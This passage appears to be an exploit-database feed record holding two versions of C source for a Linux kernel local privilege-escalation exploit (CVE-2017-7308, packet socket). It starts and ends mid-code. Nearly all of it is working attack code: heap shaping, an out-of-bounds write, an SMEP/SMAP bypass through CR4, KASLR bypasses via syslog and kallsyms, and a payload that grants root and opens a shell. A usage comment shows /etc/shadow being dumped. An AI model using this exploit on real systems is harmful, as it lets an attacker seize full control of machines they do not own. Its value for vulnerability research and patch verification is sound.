BLK_HDR_LEN - macoff + offset;\r\n\treturn packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);\r\n}\r\n\r\nvoid oob_write(char *buffer, int size) {\r\n\tloopback_send(buffer, size);\r\n}\r\n\r\nvoid oob_timer_execute(void *func, unsigned long arg) {\r\n\toob_setup(2048 + TIMER_OFFSET - 8);\r\n\r\n\tint i;\r\n\tfor (i = 0; i < 32; i++) {\r\n\t\tint timer = packet_sock_kmalloc();\r\n\t\tpacket_sock_timer_schedule(timer, 1000);\r\n\t}\r\n\r\n\tchar buffer[2048];\r\n\tmemset(&buffer[0], 0, sizeof(buffer));\r\n\r\n\tstruct timer_list *timer = (struct timer_list *)&buffer[8];\r\n\ttimer->function = func;\r\n\ttimer->data = arg;\r\n\ttimer->flags = 1;\r\n\r\n\toob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);\r\n\r\n\tsleep(1);\r\n}\r\n\r\nvoid oob_id_match_execute(void *func) {\r\n\tint s = oob_setup(2048 + XMIT_OFFSET - 64);\r\n\r\n\tint ps[32];\r\n\r\n\tint i;\r\n\tfor (i = 0; i < 32; i++)\r\n\t\tps[i] = packet_sock_kmalloc();\r\n\r\n\tchar buffer[2048];\r\n\tmemset(&buffer[0], 0, 2048);\r\n\r\n\tvoid **xmit = (void **)&buffer[64];\r\n\t*xmit = func;\r\n\r\n\toob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);\r\n\r\n\tfor (i = 0; i < 32; i++)\r\n\t\tpacket_sock_id_match_trigger(ps[i]);\r\n}\r\n\r\n// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *\r\n\r\nvoid kmalloc_pad(int count) {\r\n\tint i;\r\n\tfor (i = 0; i < count; i++)\r\n\t\tpacket_sock_kmalloc();\r\n}\r\n\r\nvoid pagealloc_pad(int count) {\r\n\tpacket_socket_setup(0x8000, 2048, count, 0, 100);\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *\r\n\r\ntypedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n\r\nvoid get_root_payload(void) {\r\n\t((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(\r\n\t\t((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)\r\n\t);\r\n}\r\n\r\n// * * * * * * * * * * * * * Simple KASLR bypass * * * * * * * * * * * * * * *\r\n\r\n#define SYSLOG_ACTION_READ_ALL 3\r\n#define SYSLOG_ACTION_SIZE_BUFFER 10\r\n\r\nunsigned long get_kernel_addr() {\r\n\tint size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\r\n\tif (size == -1) {\r\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tsize = (size / getpagesize() + 1) * getpagesize();\r\n\tchar *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE,\r\n\t\tMAP_PRIVATE|MAP_ANONYMOUS, -1, 0);\r\n\r\n\tsize = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);\r\n\tif (size == -1) {\r\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tconst char *needle1 = \"Freeing SMP\";\r\n\tchar *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in dmesg\\n\", needle1);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tfor (size = 0; substr[size] != '\\n'; size++);\r\n\r\n\tconst char *needle2 = \"ffff\";\r\n\tsubstr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in dmesg\\n\", needle2);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tchar *endptr = &substr[16];\r\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n\tr &= 0xfffffffffff00000ul;\r\n\tr -= 0x1000000ul;\r\n\r\n\treturn r;\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\r\n\r\nvoid exec_shell() {\r\n\tchar *shell = \"/bin/bash\";\r\n\tchar *args[] = {shell, \"-i\", NULL};\r\n\texecve(shell, args, NULL);\r\n}\r\n\r\nvoid fork_shell() {\r\n\tpid_t rv;\r\n\r\n\trv = fork();\r\n\tif (rv == -1) {\r\n\t\tperror(\"[-] fork()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (rv == 0) {\r\n\t\texec_shell();\r\n\t}\r\n}\r\n\r\nbool is_root() {\r\n\t// We can't simple check uid, since we're running inside a namespace\r\n\t// with uid set to 0. Try opening /etc/shadow instead.\r\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid check_root() {\r\n\tprintf(\"[.] checking if we got root\\n\");\r\n\r\n\tif (!is_root()) {\r\n\t\tprintf(\"[-] something went wrong =(\\n\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tprintf(\"[+] got r00t ^_^\\n\");\r\n\r\n\t// Fork and exec instead of just doing the exec to avoid potential\r\n\t// memory corruptions when closing packet sockets.\r\n\tfork_shell();\r\n}\r\n\r\nbool write_file(const char* file, const char* what, ...) {\r\n\tchar buf[1024];\r\n\tva_list args;\r\n\tva_start(args, what);\r\n\tvsnprintf(buf, sizeof(buf), what, args);\r\n\tva_end(args);\r\n\tbuf[sizeof(buf) - 1] = 0;\r\n\tint len = strlen(buf);\r\n\r\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tif (write(fd, buf, len) != len) {\r\n\t\tclose(fd);\r\n\t\treturn false;\r\n\t}\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid setup_sandbox() {\r\n\tint real_uid = getuid();\r\n\tint real_gid = getgid();\r\n\r\n if (unshare(CLONE_NEWUSER) != 0) {\r\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n if (unshare(CLONE_NEWNET) != 0) {\r\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\r\n\t\tperror(\"[-] write_file(/proc/self/set_groups)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)){\r\n\t\tperror(\"[-] write_file(/proc/self/uid_map)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\r\n\t\tperror(\"[-] write_file(/proc/self/gid_map)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tcpu_set_t my_set;\r\n\tCPU_ZERO(&my_set);\r\n\tCPU_SET(0, &my_set);\r\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\r\n\t\tperror(\"[-] sched_setaffinity()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\r\n\t\tperror(\"[-] system(/sbin/ifconfig lo up)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nint main() {\r\n\tprintf(\"[.] starting\\n\");\r\n\r\n\tsetup_sandbox();\r\n\r\n\tprintf(\"[.] namespace sandbox set up\\n\");\r\n\r\n#if ENABLE_KASLR_BYPASS\r\n\tprintf(\"[.] KASLR bypass enabled, getting kernel addr\\n\");\r\n\tKERNEL_BASE = get_kernel_addr();\r\n\tprintf(\"[.] done, kernel text: %lx\\n\", KERNEL_BASE);\r\n#endif\r\n\r\n\tprintf(\"[.] commit_creds: %lx\\n\", KERNEL_BASE + COMMIT_CREDS);\r\n\tprintf(\"[.] prepare_kernel_cred: %lx\\n\", KERNEL_BASE + PREPARE_KERNEL_CRED);\r\n\r\n#if ENABLE_SMEP_SMAP_BYPASS\r\n\tprintf(\"[.] native_write_cr4: %lx\\n\", KERNEL_BASE + NATIVE_WRITE_CR4);\r\n#endif\r\n\r\n\tprintf(\"[.] padding heap\\n\");\r\n\tkmalloc_pad(KMALLOC_PAD);\r\n\tpagealloc_pad(PAGEALLOC_PAD);\r\n\tprintf(\"[.] done, heap is padded\\n\");\r\n\r\n#if ENABLE_SMEP_SMAP_BYPASS\r\n\tprintf(\"[.] SMEP & SMAP bypass enabled, turning them off\\n\");\r\n\toob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);\r\n\tprintf(\"[.] done, SMEP & SMAP should be off now\\n\");\r\n#endif\r\n\r\n\tprintf(\"[.] executing get root payload %p\\n\", &get_root_payload);\r\n\toob_id_match_execute((void *)&get_root_payload);\r\n\tprintf(\"[.] done, should be root now\\n\");\r\n\r\n\tcheck_root();\r\n\r\n\twhile (1) sleep(1000);\r\n\r\n\treturn 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41994/"}, {"lastseen": "2019-07-26T11:22:52", "description": "", "published": "2018-12-29T00:00:00", "type": "exploitdb", "title": "Linux Kernel 4.8.0-34 &lt; 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7308"], "modified": "2018-12-29T00:00:00", "id": "EDB-ID:47168", "href": "https://www.exploit-db.com/exploits/47168", "sourceData": "// A proof-of-concept local root exploit for CVE-2017-7308.\r\n// Includes a SMEP & SMAP bypass.\r\n// Tested on Ubuntu / Linux Mint:\r\n// - 4.8.0-34-generic\r\n// - 4.8.0-36-generic\r\n// - 4.8.0-39-generic\r\n// - 4.8.0-41-generic\r\n// - 4.8.0-42-generic\r\n// - 4.8.0-44-generic\r\n// - 4.8.0-45-generic\r\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308\r\n//\r\n// Usage:\r\n// user@ubuntu:~$ uname -a\r\n// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ...\r\n// user@ubuntu:~$ gcc pwn.c -o pwn\r\n// user@ubuntu:~$ ./pwn \r\n// [.] starting\r\n// [.] system has 2 processors\r\n// [.] checking kernel version\r\n// [.] kernel version '4.8.0-41-generic' detected\r\n// [~] done, version looks good\r\n// [.] checking SMEP and SMAP\r\n// [~] done, looks good\r\n// [.] setting up namespace sandbox\r\n// [~] done, namespace sandbox set up\r\n// [.] KASLR bypass enabled, getting kernel addr\r\n// [.] done, kernel text: ffffffff87000000\r\n// [.] commit_creds: ffffffff870a5cf0\r\n// [.] prepare_kernel_cred: ffffffff870a60e0\r\n// [.] native_write_cr4: ffffffff87064210\r\n// [.] padding heap\r\n// [.] done, heap is padded\r\n// [.] SMEP & SMAP bypass enabled, turning them off\r\n// [.] done, SMEP & SMAP should be off now\r\n// [.] executing get root payload 0x401516\r\n// [.] done, should be root now\r\n// [.] checking if we got root\r\n// [+] got r00t ^_^\r\n// root@ubuntu:/home/user# cat /etc/shadow\r\n// root:!:17246:0:99999:7:::\r\n// daemon:*:17212:0:99999:7:::\r\n// bin:*:17212:0:99999:7:::\r\n// ...\r\n//\r\n// Andrey Konovalov <andreyknvl@gmail.com>\r\n// ---\r\n// Updated by <bcoles@gmail.com>\r\n// - support for systems with SMEP but no SMAP\r\n// - check number of CPU cores\r\n// - additional kernel targets\r\n// - additional KASLR bypasses\r\n// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2017-7308\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <assert.h>\r\n#include <fcntl.h>\r\n#include <stdarg.h>\r\n#include <stdbool.h>\r\n#include <stddef.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sched.h>\r\n\r\n#include <sys/ioctl.h>\r\n#include <sys/klog.h>\r\n#include <sys/mman.h>\r\n#include <sys/socket.h>\r\n#include <sys/syscall.h>\r\n#include <sys/sysinfo.h>\r\n#include <sys/types.h>\r\n#include <sys/utsname.h>\r\n#include <sys/wait.h>\r\n\r\n#include <arpa/inet.h>\r\n#include <linux/if_packet.h>\r\n#include <linux/ip.h>\r\n#include <linux/udp.h>\r\n#include <netinet/if_ether.h>\r\n#include <net/if.h>\r\n\r\n#define DEBUG\r\n\r\n#ifdef DEBUG\r\n# define dprintf printf\r\n#else\r\n# define dprintf\r\n#endif\r\n\r\n#define ENABLE_KASLR_BYPASS\t\t1\r\n#define ENABLE_SMEP_SMAP_BYPASS\t\t1\r\n\r\nchar *SHELL = \"/bin/bash\";\r\n\r\n// Will be overwritten if ENABLE_KASLR_BYPASS\r\nunsigned long KERNEL_BASE = \t\t0xffffffff81000000ul;\r\n\r\n// Will be overwritten by detect_versions().\r\nint kernel = -1;\r\n\r\nstruct kernel_info {\r\n\tconst char* version;\r\n\tuint64_t commit_creds;\r\n\tuint64_t prepare_kernel_cred;\r\n\tuint64_t native_write_cr4;\r\n};\r\n\r\nstruct kernel_info kernels[] = {\r\n\t{ \"4.8.0-34-generic\", 0xa5d50, 0xa6140, 0x64210 },\r\n\t{ \"4.8.0-36-generic\", 0xa5d50, 0xa6140, 0x64210 },\r\n\t{ \"4.8.0-39-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\r\n\t{ \"4.8.0-41-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\r\n\t{ \"4.8.0-42-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\r\n\t{ \"4.8.0-44-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\r\n\t{ \"4.8.0-45-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\r\n};\r\n\r\n// Used to get root privileges.\r\n#define COMMIT_CREDS\t\t\t(KERNEL_BASE + kernels[kernel].commit_creds)\r\n#define PREPARE_KERNEL_CRED\t\t(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)\r\n#define NATIVE_WRITE_CR4\t\t(KERNEL_BASE + kernels[kernel].native_write_cr4)\r\n\r\n// Will be overwritten if ENABLE_SMEP_SMAP_BYPASS\r\nunsigned long CR4_DESIRED_VALUE =\t0x406e0ul;\r\n\r\n#define KMALLOC_PAD\t\t\t512\r\n#define PAGEALLOC_PAD\t\t\t1024\r\n\r\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\r\n\r\ntypedef uint32_t u32;\r\n\r\n// $ pahole -C hlist_node ./vmlinux\r\nstruct hlist_node {\r\n\tstruct hlist_node * next; /* 0 8 */\r\n\tstruct hlist_node * * pprev; /* 8 8 */\r\n};\r\n\r\n// $ pahole -C timer_list ./vmlinux\r\nstruct timer_list {\r\n\tstruct hlist_node entry; /* 0 16 */\r\n\tlong unsigned int expires; /* 16 8 */\r\n\tvoid (*function)(long unsigned int); /* 24 8 */\r\n\tlong unsigned int data; /* 32 8 */\r\n\tu32 flags; /* 40 4 */\r\n\tint start_pid; /* 44 4 */\r\n\tvoid * start_site; /* 48 8 */\r\n\tchar start_comm[16]; /* 56 16 */\r\n};\r\n\r\n// packet_sock->rx_ring->prb_bdqc->retire_blk_timer\r\n#define TIMER_OFFSET\t896\r\n\r\n// pakcet_sock->xmit\r\n#define XMIT_OFFSET\t1304\r\n\r\n// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *\r\n\r\nvoid packet_socket_rx_ring_init(int s, unsigned int block_size,\r\n\t\tunsigned int frame_size, unsigned int block_nr,\r\n\t\tunsigned int sizeof_priv, unsigned int timeout) {\r\n\tint v = TPACKET_V3;\r\n\tint rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));\r\n\tif (rv < 0) {\r\n\t\tdprintf(\"[-] setsockopt(PACKET_VERSION)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tstruct tpacket_req3 req;\r\n\tmemset(&req, 0, sizeof(req));\r\n\treq.tp_block_size = block_size;\r\n\treq.tp_frame_size = frame_size;\r\n\treq.tp_block_nr = block_nr;\r\n\treq.tp_frame_nr = (block_size * block_nr) / frame_size;\r\n\treq.tp_retire_blk_tov = timeout;\r\n\treq.tp_sizeof_priv = sizeof_priv;\r\n\treq.tp_feature_req_word = 0;\r\n\r\n\trv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));\r\n\tif (rv < 0) {\r\n\t\tdprintf(\"[-] setsockopt(PACKET_RX_RING)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nint packet_socket_setup(unsigned int block_size, unsigned int frame_size,\r\n\t\tunsigned int block_nr, unsigned int sizeof_priv, int timeout) {\r\n\tint s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));\r\n\tif (s < 0) {\r\n\t\tdprintf(\"[-] socket(AF_PACKET)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tpacket_socket_rx_ring_init(s, block_size, frame_size, block_nr,\r\n\t\tsizeof_priv, timeout);\r\n\r\n\tstruct sockaddr_ll sa;\r\n\tmemset(&sa, 0, sizeof(sa));\r\n\tsa.sll_family = PF_PACKET;\r\n\tsa.sll_protocol = htons(ETH_P_ALL);\r\n\tsa.sll_ifindex = if_nametoindex(\"lo\");\r\n\tsa.sll_hatype = 0;\r\n\tsa.sll_pkttype = 0;\r\n\tsa.sll_halen = 0;\r\n\r\n\tint rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));\r\n\tif (rv < 0) {\r\n\t\tdprintf(\"[-] bind(AF_PACKET)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\treturn s;\r\n}\r\n\r\nvoid packet_socket_send(int s, char *buffer, int size) {\r\n\tstruct sockaddr_ll sa;\r\n\tmemset(&sa, 0, sizeof(sa));\r\n\tsa.sll_ifindex = if_nametoindex(\"lo\");\r\n\tsa.sll_halen = ETH_ALEN;\r\n\r\n\tif (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,\r\n\t\t\tsizeof(sa)) < 0) {\r\n\t\tdprintf(\"[-] sendto(SOCK_RAW)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nvoid loopback_send(char *buffer, int size) {\r\n\tint s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);\r\n\tif (s == -1) {\r\n\t\tdprintf(\"[-] socket(SOCK_RAW)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tpacket_socket_send(s, buffer, size);\r\n}\r\n\r\nint packet_sock_kmalloc() {\r\n\tint s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\r\n\tif (s == -1) {\r\n\t\tdprintf(\"[-] socket(SOCK_DGRAM)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\treturn s;\r\n}\r\n\r\nvoid packet_sock_timer_schedule(int s, int timeout) {\r\n\tpacket_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout);\r\n}\r\n\r\nvoid packet_sock_id_match_trigger(int s) {\r\n\tchar buffer[16];\r\n\tpacket_socket_send(s, &buffer[0], sizeof(buffer));\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n\r\n#define ALIGN(x, a)\t\t\t__ALIGN_KERNEL((x), (a))\r\n#define __ALIGN_KERNEL(x, a)\t\t__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)\r\n#define __ALIGN_KERNEL_MASK(x, mask)\t(((x) + (mask)) & ~(mask))\r\n\r\n#define V3_ALIGNMENT\t(8)\r\n#define BLK_HDR_LEN\t(ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT))\r\n\r\n#define ETH_HDR_LEN\tsizeof(struct ethhdr)\r\n#define IP_HDR_LEN\tsizeof(struct iphdr)\r\n#define UDP_HDR_LEN\tsizeof(struct udphdr)\r\n\r\n#define UDP_HDR_LEN_FULL\t(ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN)\r\n\r\nint oob_setup(int offset) {\r\n\tunsigned int maclen = ETH_HDR_LEN;\r\n\tunsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +\r\n\t\t\t\t(maclen < 16 ? 16 : maclen));\r\n\tunsigned int macoff = netoff - maclen;\r\n\tunsigned int sizeof_priv = (1u<<31) + (1u<<30) +\r\n\t\t0x8000 - BLK_HDR_LEN - macoff + offset;\r\n\treturn packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);\r\n}\r\n\r\nvoid oob_write(char *buffer, int size) {\r\n\tloopback_send(buffer, size);\r\n}\r\n\r\nvoid oob_timer_execute(void *func, unsigned long arg) {\r\n\toob_setup(2048 + TIMER_OFFSET - 8);\r\n\r\n\tint i;\r\n\tfor (i = 0; i < 32; i++) {\r\n\t\tint timer = packet_sock_kmalloc();\r\n\t\tpacket_sock_timer_schedule(timer, 1000);\r\n\t}\r\n\r\n\tchar buffer[2048];\r\n\tmemset(&buffer[0], 0, sizeof(buffer));\r\n\r\n\tstruct timer_list *timer = (struct timer_list *)&buffer[8];\r\n\ttimer->function = func;\r\n\ttimer->data = arg;\r\n\ttimer->flags = 1;\r\n\r\n\toob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);\r\n\r\n\tsleep(1);\r\n}\r\n\r\nvoid oob_id_match_execute(void *func) {\r\n\tint s = oob_setup(2048 + XMIT_OFFSET - 64);\r\n\r\n\tint ps[32];\r\n\r\n\tint i;\r\n\tfor (i = 0; i < 32; i++)\r\n\t\tps[i] = packet_sock_kmalloc();\r\n\r\n\tchar buffer[2048];\r\n\tmemset(&buffer[0], 0, 2048);\r\n\r\n\tvoid **xmit = (void **)&buffer[64];\r\n\t*xmit = func;\r\n\r\n\toob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);\r\n\r\n\tfor (i = 0; i < 32; i++)\r\n\t\tpacket_sock_id_match_trigger(ps[i]);\r\n}\r\n\r\n// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *\r\n\r\nvoid kmalloc_pad(int count) {\r\n\tint i;\r\n\tfor (i = 0; i < count; i++)\r\n\t\tpacket_sock_kmalloc();\r\n}\r\n\r\nvoid pagealloc_pad(int count) {\r\n\tpacket_socket_setup(0x8000, 2048, count, 0, 100);\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *\r\n\r\ntypedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n\r\nvoid get_root_payload(void) {\r\n\t((_commit_creds)(COMMIT_CREDS))(\r\n\t\t((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)\r\n\t);\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\r\n\r\n#define CHUNK_SIZE 1024\r\n\r\nint read_file(const char* file, char* buffer, int max_length) {\r\n\tint f = open(file, O_RDONLY);\r\n\tif (f == -1)\r\n\t\treturn -1;\r\n\tint bytes_read = 0;\r\n\twhile (true) {\r\n\t\tint bytes_to_read = CHUNK_SIZE;\r\n\t\tif (bytes_to_read > max_length - bytes_read)\r\n\t\t\tbytes_to_read = max_length - bytes_read;\r\n\t\tint rv = read(f, &buffer[bytes_read], bytes_to_read);\r\n\t\tif (rv == -1)\r\n\t\t\treturn -1;\r\n\t\tbytes_read += rv;\r\n\t\tif (rv == 0)\r\n\t\t\treturn bytes_read;\r\n\t}\r\n}\r\n\r\nvoid get_kernel_version(char* output, int max_length) {\r\n struct utsname u;\r\n int rv = uname(&u);\r\n if (rv != 0) {\r\n dprintf(\"[-] uname())\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n assert(strlen(u.release) <= max_length);\r\n strcpy(&output[0], u.release);\r\n}\r\n\r\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\r\n\r\n#define KERNEL_VERSION_LENGTH 32\r\n\r\nvoid detect_versions() {\r\n\tchar version[KERNEL_VERSION_LENGTH];\r\n\r\n\tget_kernel_version(&version[0], KERNEL_VERSION_LENGTH);\r\n\r\n\tint i;\r\n\tfor (i = 0; i < ARRAY_SIZE(kernels); i++) {\r\n\t\tif (strcmp(&version[0], kernels[i].version) == 0) {\r\n\t\t\tdprintf(\"[.] kernel version '%s' detected\\n\", kernels[i].version);\r\n\t\t\tkernel = i;\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\r\n\tdprintf(\"[-] kernel version not recognized\\n\");\r\n\texit(EXIT_FAILURE);\r\n}\r\n\r\n#define PROC_CPUINFO_LENGTH 4096\r\n\r\n// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP\r\nint smap_smep_enabled() {\r\n\tchar buffer[PROC_CPUINFO_LENGTH];\r\n\tchar* path = \"/proc/cpuinfo\";\r\n\tint length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);\r\n\tif (length == -1) {\r\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint rv = 0;\r\n\tchar* found = memmem(&buffer[0], length, \"smep\", 4);\r\n\tif (found != NULL)\r\n\t\trv += 1;\r\n\tfound = memmem(&buffer[0], length, \"smap\", 4);\r\n\tif (found != NULL)\r\n\t\trv += 2;\r\n\treturn rv;\r\n}\r\n\r\nvoid check_smep_smap() {\r\n\tint rv = smap_smep_enabled();\r\n\r\n#if !ENABLE_SMEP_SMAP_BYPASS\r\n\tif (rv >= 1) {\r\n\t\tdprintf(\"[-] SMAP/SMEP detected, use ENABLE_SMEP_SMAP_BYPASS\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n#endif\r\n\r\n\tswitch(rv) {\r\n\tcase 1: // SMEP\r\n\t\tCR4_DESIRED_VALUE = 0x406e0ul;\r\n\t\tbreak;\r\n\tcase 2: // SMAP\r\n\t\tCR4_DESIRED_VALUE = 0x407f0ul;\r\n\t\tbreak;\r\n\tcase 3: // SMEP and SMAP\r\n\t\tCR4_DESIRED_VALUE = 0x407f0ul;\r\n\t\tbreak;\r\n\t}\r\n}\r\n\r\n// * * * * * * * * * * * * * Syslog KASLR bypass * * * * * * * * * * * * * * *\r\n\r\n#define SYSLOG_ACTION_READ_ALL 3\r\n#define SYSLOG_ACTION_SIZE_BUFFER 10\r\n\r\nunsigned long get_kernel_addr_syslog() {\r\n\tdprintf(\"[.] trying syslog...\\n\");\r\n\r\n\tint size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\r\n\tif (size == -1) {\r\n\t\tdprintf(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tsize = (size / getpagesize() + 1) * getpagesize();\r\n\tchar *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE,\r\n\t\tMAP_PRIVATE|MAP_ANONYMOUS, -1, 0);\r\n\r\n\tsize = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);\r\n\tif (size == -1) {\r\n\t\tdprintf(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tconst char *needle1 = \"Freeing SMP\";\r\n\tchar *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n\tif (substr == NULL) {\r\n\t\tdprintf(\"[-] substring '%s' not found in dmesg\\n\", needle1);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tfor (size = 0; substr[size] != '\\n'; size++);\r\n\r\n\tconst char *needle2 = \"ffff\";\r\n\tsubstr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));\r\n\tif (substr == NULL) {\r\n\t\tdprintf(\"[-] substring '%s' not found in dmesg\\n\", needle2);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tchar *endptr = &substr[16];\r\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n\tr &= 0xfffffffffff00000ul;\r\n\tr -= 0x1000000ul;\r\n\r\n\treturn r;\r\n}\r\n\r\n// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_kallsyms() {\r\n\tFILE *f;\r\n\tunsigned long addr = 0;\r\n\tchar dummy;\r\n\tchar sname[256];\r\n\tchar* name = \"startup_64\";\r\n\tchar* path = \"/proc/kallsyms\";\r\n\r\n\tdprintf(\"[.] trying %s...\\n\", path);\r\n\tf = fopen(path, \"r\");\r\n\tif (f == NULL) {\r\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tint ret = 0;\r\n\twhile (ret != EOF) {\r\n\t\tret = fscanf(f, \"%p %c 